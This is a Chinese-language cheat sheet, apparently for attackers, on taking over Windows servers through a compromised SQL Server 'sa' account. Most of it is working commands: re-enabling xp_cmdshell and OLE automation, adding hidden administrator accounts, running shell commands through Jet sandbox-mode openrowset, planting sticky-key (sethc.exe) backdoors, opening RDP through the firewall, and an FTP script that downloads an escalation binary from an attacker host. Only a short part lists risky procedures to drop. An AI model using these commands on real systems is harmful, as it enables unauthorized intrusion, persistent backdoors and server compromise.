net net1被禁止時執行CMD命令<br> | |
net user Administrator$ 920517 /add<br> | |
net localgroup administrators Administrator$ /add <br> | |
第一步:dir net.exe /s /p 或者 dir net1.exe /s /p<br> | |
第二步:C:/WINDOWS/system32/dllcache/net1.exe user 123 123 /add<br> | |
第三步:C:/WINDOWS/system32/dllcache/net1.exe localgroup administrators 123 /add<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
沙盤模式提權<br> | |
sethc.exe禁止<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cacls c:/windows/system32/net.exe /e /t /g everyone:F')<br> | |
net net1都被禁用<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')<br> | |
如果cmd被禁用<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user user pass /add")')</p><p>◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
除了xplog70.dll其他的都可以用這命令修復<br> | |
第一步先刪除:<br> | |
drop procedure sp_addextendedproc <br> | |
drop procedure sp_oacreate <br> | |
exec sp_dropextendedproc 'xp_cmdshell' <br> | |
服務器: 消息 3701,級別 11,狀態 5,行 1<br> | |
無法 除去 過程 'sp_addextendedproc',因爲它在系統目錄中不存在。<br> | |
服務器: 消息 3701,級別 11,狀態 5,過程 sp_dropextendedproc,行 18<br> | |
無法 除去 過程 'xp_cmdshell',因爲它在系統目錄中不存在。<br> | |
第二步恢復:<br> | |
dbcc addextendedproc ("sp_oacreate","odsole70.dll") <br> | |
dbcc addextendedproc ("xp_cmdshell","xplog70.dll") <br> | |
直接恢復,不管sp_addextendedproc是不是存在 <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
1.未能找到存儲過程'master..xpcmdshell'之解決方法:<br> | |
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int<br> | |
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
恢復sp_addextendedproc語句:<br> | |
create procedure sp_addextendedproc --- 1996/08/30 20:13<br> | |
@functname nvarchar(517),/* (owner.)name of function to call */<br> | |
@dllname varchar(255)/* name of DLL containing function */<br> | |
as<br> | |
set implicit_transactions off<br> | |
if @@trancount > 0<br> | |
begin<br> | |
raiserror(15002,-1,-1,'sp_addextendedproc')<br> | |
return (1)<br> | |
end<br> | |
dbcc addextendedproc( @functname, @dllname)<br> | |
return (0) -- sp_addextendedproc<br> | |
GO<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆</p><p>2 無法裝載 DLL xpsql70.dll 或該DLL所引用的某一DLL。原因126(找不到指定模塊。)<br> | |
恢復方法:查詢分離器連接後,<br> | |
sp_dropextendedproc "xp_cmdshell"<br> | |
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'<br> | |
修復XPLOG70.DLL(先用文件查看下備份的目錄下/x86/bin,然後把下面目錄替換)<br> | |
第一步<br> | |
exec sp_dropextendedproc 'xp_cmdshell'<br> | |
第二步<br> | |
dbcc addextendedproc ("xp_cmdshell","c:/sql2ksp4/x86/binn/xplog70.dll")<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
126 錯誤<br> | |
修復XPLOG70.DLL(先用文件查看下備份的目錄下/x86/bin,然後把下面目錄替換)<br> | |
第一步<br> | |
exec sp_dropextendedproc 'xp_cmdshell'<br> | |
第二步<br> | |
dbcc addextendedproc ("xp_cmdshell","c:/sql2ksp4/x86/binn/xplog70.dll")<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
127 錯誤<br> | |
exec sp_dropextendedproc 'xp_cmdshell'<br> | |
exec sp_addextendedproc 'xp_cmdshell','c:/Program Files/Microsoft SQL Server/MSSQL/Binn/xplog70.dll'</p><p>dbcc addextendedproc ("xp_cmdshell","c:/Program Files/Microsoft SQL Server/MSSQL/Binn/xplog70.dll")</p><p>◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
4.直接添加帳戶法<br> | |
刪除odsole70.dll:<br> | |
exec master..sp_dropextendedproc sp_oamethod<br> | |
exec master..sp_dropextendedproc sp_oacreate<br> | |
恢復odsole70.dll:<br> | |
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OACreate,'odsole70.dll'<br> | |
直接添加帳戶命令:<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod <br> | |
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user sin sinhack /add'<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe/c net localgroup administrators sin /add' <br> | |
FTP下載命令<br> | |
declare @o int, @f int, @t int, @ret int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out<br> | |
exec sp_oamethod @o, 'createtextfile', @f out, 'C:/1.bat', 1<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp賬號'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密碼'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'get en.exe(無net提權腳本)c:/en.exe'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'</p><p><br> | |
3、net提權出現 拒絕訪問錯誤5 (重點)<br> | |
這種情況就不用嘗試net1了,可以試試copy shift後門,如果copy後提示覆制0文件,證明沒有成功。那麼可以試試能不能上傳,如果能上傳直接傳個前段時間出來的無net提權工具,然後加個用戶就可以了。但是這種情況大部分都是不能上傳的,那麼就要考慮一下了。既然能執行cmd,那麼就能通過cmd下ftp下載文件,可是ftp前提是要能寫進文本或批處理。那麼就可以通過sql語句寫進一個文本或批處理啊。<br> | |
declare @o int, @f int, @t int, @ret int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out<br> | |
exec sp_oamethod @o, 'createtextfile', @f out, 'C:/1.bat', 1<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp賬號'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密碼'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'get en.exe(無net提權腳本)c:/en.exe'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'<br> | |
查詢分析器執行成功後,不出意外,會在c盤出現一個1.bat(如果執行成功了,c盤卻沒有,可以換個文件夾寫入,因爲哪個服務器c盤根目錄禁止寫入)<br> | |
然後cmd執行ftp -s:c:/1.bat<br> | |
這個執行完了以後,就會在c盤ftp下載一個無net提權腳本 或者直接寫個vbs提權腳本<br> | |
declare @o int, @f int, @t int, @ret int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out<br> | |
exec sp_oamethod @o, 'createtextfile', @f out, 'c:/1.vbs', 1<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create("用戶")'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "密碼",""'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'<br> | |
然後cmd執行cscript c:/1.vbs 就可以了<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
Cmd 命令開3389:<br> | |
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f<br> | |
1.查詢終端端口<br> | |
REG query HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server/WinStations/RDP-Tcp /v PortNumber</p><p>2.開啓XP&2003終端服務<br> | |
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</p><p>3.更改終端端口爲2008(0x7d8)默認爲3389(0xD3D)<br> | |
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server/Wds/rdpwd/Tds/tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f<br> | |
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server/WinStations/RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f</p><p>4.取消xp&2003系統防火牆對終端服務的限制及IP連接的限制<br> | |
REG ADD HKLM/SYSTEM/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f<br> | |
sql語句開3389<br> | |
開3389:<br> | |
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections','REG_DWORD',0;-- <br> | |
關3389:<br> | |
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections','REG_DWORD',1; <br> | |
查看3389端口<br> | |
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp','PortNumber'<br> | |
查看系統版本<br> | |
type c:/boot.ini<br> | |
普通CMD後門<br> | |
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','debugger','reg_sz','c:/windows/system32/cmd.exe'<br> | |
5下shift後門命令<br> | |
declare @o int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out <br> | |
exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe' ,'c:/windows/system32/sethc.exe';<br> | |
declare @o int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out <br> | |
exec sp_oamethod @o, 'copyfile',null,'c:/windows/system32/sethc.exe' ,'c:/windows/system32/dllcache/sethc.exe';<br> | |
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe<br> | |
copy c:/windows/system32/sethc.exe c:/windows/system32/dllcache/sethc.exe<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
5.恢復時一些常用的SQL語句:<br> | |
利用sp_addextendedproc恢復大部分常用存儲擴展(得先利用最頂上的語句恢復自己):<br> | |
use master <br> | |
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' <br> | |
exec sp_addextendedproc xp_dirtree,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' <br> | |
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' <br> | |
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' <br> | |
exec sp_addextendedproc sp_OACreate,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' <br> | |
exec sp_addextendedproc sp_OAStop,'odsole70.dll' <br> | |
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regread,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_regwrite,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_availablemedia,'xpstar.dll' <br> | |
恢復cmdshell:<br> | |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
1.sql命令查詢註冊表粘滯鍵是否被劫持<br> | |
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','Debugger'<br> | |
2.sql命令劫持註冊表粘滯鍵功能,替換成任務管理器(當然你也可以替換成你想要的其他命令)<br> | |
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe', <br> | |
'Debugger','REG_SZ','C:/WINDOWS/system32/taskmgr.exe'<br> | |
3.sql命令刪除註冊表粘滯鍵的劫持功能保護你的服務器不再被他人利用<br> | |
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
SQL Server 阻止了對組件 'xp_cmdshell' 的 過程'sys.xp_cmdshell' 的訪問,因爲此組件已作爲此服務器安全配置的一部分而被關閉。系統管理員可以通過使用 sp_configure 啓用 'xp_cmdshell'。有關啓用 'xp_cmdshell' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。 <br> | |
;EXEC sp_configure 'show advanced options', 1 -- <br> | |
;RECONFIGURE WITH OVERRIDE -- <br> | |
;EXEC sp_configure 'xp_cmdshell', 1 -- <br> | |
;RECONFIGURE WITH OVERRIDE -- <br> | |
;EXEC sp_configure 'show advanced options', 0 -- <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
分析器執行的語句:<br> | |
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
xpsql.cpp: 錯誤 5 來自 CreateProcess(第 737 行) 直接加帳號!<br> | |
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0<br> | |
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user admin$ 920517 /add")');<br> | |
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators admin$ /add")');<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
恢復xp_cmdshell<br> | |
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'<br> | |
sp_addextendedproc 'xp_cmdshell','xplog70.dll'<br> | |
添加存儲過程<br> | |
sp_addextendedproc 'sp_oacreate','odsole70.dll<br> | |
sp_addextendedproc 'xp_lake2', 'd:/wwwroot/caoo/wwwroot/xplake2.dll'<br> | |
sp_dropextendedproc xp_lake2<br> | |
加賬號<br> | |
EXEC xp_lake2 'net user > d:/wwwroot/caoo/wwwroot/1.txt'<br> | |
EXEC xp_lake2 'net user admin$ admin /add'<br> | |
EXEC xp_lake2 'net localgroup administrators admin$ /add'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
3389 SHIFTSA沙盒模式提權-----<br> | |
----------------------<br> | |
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;<br> | |
-------------------------------------------------------<br> | |
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user sql$ 123 /add")');<br> | |
-------------------------------------------------------<br> | |
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators sql$ /add")');</p><p>◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
四.終極方法:<br> | |
如果以上方法均不可恢復,請嘗試用下面的辦法直接添加帳戶:<br> | |
查詢分離器連接後,<br> | |
2000servser系統:<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output<br> | |
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 123 123 /add'<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod<br> | |
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 123 /add'<br> | |
xp或2003server系統:<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod<br> | |
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 123 123 /add'<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod<br> | |
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 123 /add'<br> | |
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin 1234 /add")')<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c net localgroup administrators admin /add")')<br> | |
declare @o int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out <br> | |
exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe' ,'c:/windows/system32/sethc.exe';<br> | |
declare @oo int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @oo out <br> | |
exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe' ,'c:/windows/system32/dllcache/sethc.exe';<br> | |
sp_configure 'show advanced options', 1;<br> | |
GO<br> | |
RECONFIGURE;<br> | |
GO<br> | |
sp_configure 'Ole Automation Procedures', 1;<br> | |
GO<br> | |
RECONFIGURE;<br> | |
GO</p><p>◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user'<br> | |
執行SQL語句時發生錯誤!<br> | |
錯 誤描述:SQL Server 阻止了對組件 'Ole Automation Procedures' 的 過程'sys.sp_OACreate' 的訪問,因爲此組件已作爲此服務器安全配置的一部分而被關閉。系統管理員可以通過使用 sp_configure 啓用 'Ole Automation Procedures'。有關啓用 'Ole Automation Procedures' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。 <br> | |
exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'--<br> | |
成功。<br> | |
再執行SQL語句<br> | |
[Microsoft][ODBC SQL Server Driver][SQL Server]在執行 xp_cmdshell 的過程中出錯。調用 'CreateProcess' 失敗,錯誤代碼: '5'。<br> | |
解決方案:<br> | |
遇到sql server 2005 ,恢復xp_cmdshell的辦法 <br> | |
SQL Server 已封鎖元件 'xp_cmdshell' 的 程序 'sys.xp_cmdshell' 之存取,因為此元件已經由此伺服器的安全性組態關閉。系統管理員可以使用 sp_configure 來啟用 'xp_cmdshell' 的使用。如需有關啟用 'xp_cmdshell' 的詳細資訊,請參閱《SQL Server 線上叢書》中的<介面區組態>(Surface Area Configuration)。<br> | |
用下面一句話就可以瞭解決了。<br> | |
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;<br> | |
關閉一樣.只是將上面的後面的那個"1"改成"0"就可以了.<br> | |
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;<br> | |
按照上面的方法試了一下,不行,很鬱悶,無聊中就用下面命令查看註冊表中的啓動項目,然後在看,xp_cmdshell竟然恢復成功了.<br> | |
Exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Run'<br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
在獲得SA密碼後,往往因爲服務器管理者或”前人”將net.exe和net1.exe被限制使用,無法添加管理員賬號。我們知道VBS在活動目錄(ADSI)部分有一個winnt對象,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個管理員,具體代碼如下:<br> | |
set wsnetwork=CreateObject("WSCRIPT.NETWORK")<br> | |
os="WinNT://"&wsnetwork.ComputerName<br> | |
Set ob=GetObject(os) '得到adsi接口,綁定<br> | |
Set oe=GetObject(os&"/Administrators,group") '屬性,admin組<br> | |
Set od=ob.Create("user","test") '建立用戶<br> | |
od.SetPassword "1234" '設置密碼<br> | |
od.SetInfo '保存<br> | |
Set of=GetObject(os&"/test",user) '得到用戶<br> | |
oe.add os&"/test"<br> | |
將上面的代碼保存爲1.vbs,然後執行,命令爲“cscript 1.vbs”,這樣就會在系統添加一個系統名爲test,密碼爲1234的用戶。具體在查詢分析器執行的代碼如下:<br> | |
declare @o int, @f int, @t int, @ret int<br> | |
exec sp_oacreate 'scripting.filesystemobject', @o out<br> | |
exec sp_oamethod @o, 'createtextfile', @f out, 'c:/1.vbs', 1<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject<br> | |
("WSCRIPT.NETWORK")'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.<br> | |
ComputerName'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject<br> | |
(os&"/Administrators,group")'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create<br> | |
("user","test")'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject<br> | |
(os&"/test",user) '<br> | |
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'</p><p>執行完上面的語句,再執行下面這行代碼,這行代碼一定單獨執行,不要與上面的放在一起執行,否則會提示“c:/1.vbs正被另一個程序運行”而無法成功添加用戶:<br> | |
exec master..xp_cmdshell 'cscript c:/1.vbs'<br> | |
如果系統用戶沒有添加成功,有可能是因爲系統用戶的密碼1234的太簡單,不符合服務器的複雜密碼策略,可以考慮設置的複雜些,然後再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式爲:<br> | |
exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")<br> | |
>>1.vbs'<br> | |
不過,不知道爲什麼所有帶“&”字符的命令行都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。<br> | |
使用jet沙盤模式,可以解決XP_cmdshell等存儲過程和相關動態鏈接庫帶來的煩惱。出於安全原因,系統默認情況下沙盤模式未開啓,這就需要xp_regwrite開啓沙盤模式:<br> | |
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0<br> | |
/Engines','SandBoxMode','REG_DWORD',1<br> | |
然後執行沙盤命令,在系統添加一個用戶名爲test,密碼爲1234的用戶:<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows<br> | |
/system32/ias/ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')<br> | |
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows<br> | |
/system32/ias/ias.mdb','select shell("cmd.exe /c net localgroup<br> | |
administrators test /add")')<br> | |
不同的操作系統,路徑也不一樣,需要根據情況做修改:<br> | |
NT/2K: c:/winnt/system32/<br> | |
XP/2003: c:/windows/system32/<br> | |
另外Microsoft SQL Server2005在默認情況下,一些存儲過程是關閉着的,需要命令打開:<br> | |
開啓XP_cmdshell:<br> | |
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure<br> | |
'xp_cmdshell', 1;RECONFIGURE;<br> | |
開啓'OPENROWSET':<br> | |
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure<br> | |
'Ad Hoc Distributed Queries',1;RECONFIGURE;<br> | |
開啓'sp_oacreate':<br> | |
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure<br> | |
'Ole Automation Procedures',1;RECONFIGURE;</p><p></p><p>錯誤:<br> | |
SQL Server 阻止了對組件 'Ad Hoc Distributed Queries' 的 STATEMENT'OpenRowset/OpenDatasource' 的訪問,因爲此組件已作爲此服務器安全配置的一部分而被關閉。系統管理員可以通過使用 sp_configure 啓用 'Ad Hoc Distributed Queries'。有關啓用 'Ad Hoc Distributed Queries' 的詳細信息,請參閱 SQL Server 聯機叢書中的 "外圍應用配置器"。<br> | |
分析:<br> | |
Ad Hoc Distributed Queries 是advanced options ,因此必須先將'show advanced options',1,打開高級選項後才能對它進行設置。關閉時,也是先關Ad Hoc Distributed Queries 再關advanced options。<br> | |
解決方案:<br> | |
打開SqlServer2005,執行以下存儲過程:代碼如下:<br> | |
啓用Ad Hoc Distributed Queries:<br> | |
exec sp_configure 'show advanced options',1 <br> | |
reconfigure <br> | |
exec sp_configure 'Ad Hoc Distributed Queries',1 <br> | |
reconfigure <br> | |
使用完成後,關閉Ad Hoc Distributed Queries: <br> | |
exec sp_configure 'Ad Hoc Distributed Queries',0 <br> | |
reconfigure <br> | |
exec sp_configure 'show advanced options',0 <br> | |
reconfigure<br> | |
或者使用圖形界面啓動服務:<br> | |
如圖:</p><p>◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
刪除sql危險存儲: <br> | |
DROP PROCEDURE sp_makewebtask <br> | |
exec master..sp_dropextendedproc xp_cmdshell <br> | |
exec master..sp_dropextendedproc xp_dirtree <br> | |
exec master..sp_dropextendedproc xp_fileexist <br> | |
exec master..sp_dropextendedproc xp_terminate_process <br> | |
exec master..sp_dropextendedproc sp_oamethod <br> | |
exec master..sp_dropextendedproc sp_oacreate <br> | |
exec master..sp_dropextendedproc xp_regaddmultistring <br> | |
exec master..sp_dropextendedproc xp_regdeletekey <br> | |
exec master..sp_dropextendedproc xp_regdeletevalue <br> | |
exec master..sp_dropextendedproc xp_regenumkeys <br> | |
exec master..sp_dropextendedproc xp_regenumvalues <br> | |
exec master..sp_dropextendedproc sp_add_job <br> | |
exec master..sp_dropextendedproc sp_addtask <br> | |
exec master..sp_dropextendedproc xp_regread <br> | |
exec master..sp_dropextendedproc xp_regwrite <br> | |
exec master..sp_dropextendedproc xp_readwebtask <br> | |
exec master..sp_dropextendedproc xp_makewebtask <br> | |
exec master..sp_dropextendedproc xp_regremovemultistring <br> | |
exec master..sp_dropextendedproc sp_OACreate <br> | |
DROP PROCEDURE sp_addextendedproc <br> | |
◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆◆<br> | |
恢復擴展存儲過程的辦法 <br> | |
先恢復sp_addextendedproc,語句如下: <br> | |
第一:<br> | |
create procedure sp_addextendedproc --- 1996/08/30 20:13 <br> | |
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as <br> | |
set implicit_transactions off <br> | |
if @@trancount > 0 <br> | |
begin <br> | |
raiserror(15002,-1,-1,'sp_addextendedproc') <br> | |
return (1) <br> | |
end <br> | |
dbcc addextendedproc( @functname, @dllname) <br> | |
return (0) -- sp_addextendedproc <br> | |
GO <br> | |
第二: <br> | |
use master <br> | |
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' <br> | |
exec sp_addextendedproc xp_dirtree,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' <br> | |
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' <br> | |
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' <br> | |
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' <br> | |
exec sp_addextendedproc sp_OACreate,'odsole70.dll' <br> | |
